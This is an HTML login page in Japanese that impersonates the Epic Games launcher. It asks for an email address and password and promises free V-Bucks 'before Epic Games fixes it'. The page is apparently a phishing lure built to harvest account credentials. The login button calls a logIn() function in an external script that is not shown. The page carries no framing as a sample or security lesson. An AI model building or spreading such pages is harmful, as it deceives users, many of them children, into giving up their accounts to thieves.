<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>EPICGAMESランチャー</title>
    <style>
        body {
            background: linear-gradient(to right, #ff00ff, #ff3f3f, #ff7f00, #ffff00, #00ff00, #00ffff, #0000ff);
            background-size: 200% auto;
            animation: gradient 10s ease infinite;
            color: white;
            font-family: sans-serif;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            padding: 1em;
            box-sizing: border-box;
            text-align: center;
        }
        form {
            margin-top: 2em;
            display: flex;
            flex-direction: column;
            align-items: center;
            text-align: center;
            width: 100%;
            max-width: 400px;
        }
        h1 {
            font-size: 3em;
            margin-top: 0;
        }
        input[type="email"], input[type="password"], button {
            font-size: 1.5em;
            margin: 0.5em;
            padding: 0.5em;
            background-color: #2f2f2f;
            border: none;
            color: white;
            border-radius: 5px;
            box-shadow: 0 0 5px #fff;
            width: 100%;
            max-width: 350px;
        }
        button {
            margin-top: auto;
            background-color: #00bfff;
            color: black;
            box-shadow: 0 0 5px #000;
            cursor: pointer;
            max-width: 150px;
        }
        .message {
            font-size: 1.2em;
            margin: 1em;
            text-align: center;
            max-width: 300px;
        }
        .message h2 {
            margin-bottom: 0.5em;
        }
        .privacy {
            font-size: 1.2em;
            margin: 1em;
            text-align: center;
            max-width: 300px;
        }
        .privacy button {
            padding: 0.5em;
            background-color: transparent;
            border: none;
            color: #00bfff;
            text-decoration: underline;
            cursor: pointer;
        }
        .privacy button:hover {
            text-decoration: none;
        }
    </style>

    <script src="script.js"></script>

</head>
<body>
    <h1>EPICGAMESランチャー</h1>
    <form>
        <h2>メールアドレス</h2>
        <input type="email" id="email" name="email" placeholder="メールアドレスを入力">
        <h2>パスワード</h2>
        <input type="password" id="password" name="password" placeholder="パスワードを入力">
        <button onclick="logIn()">ログイン</button>
    </form>
    <div class="message">
        <h2>EPICGAMESが修正する前にVバックスを受け取ろう！</h2>
        <p>ログインすると、Vバックスを受け取ることができます。</p>
    </div>
    <div class="privacy">
        <button>プライバシー</button>
    </div>
</body>
</html>
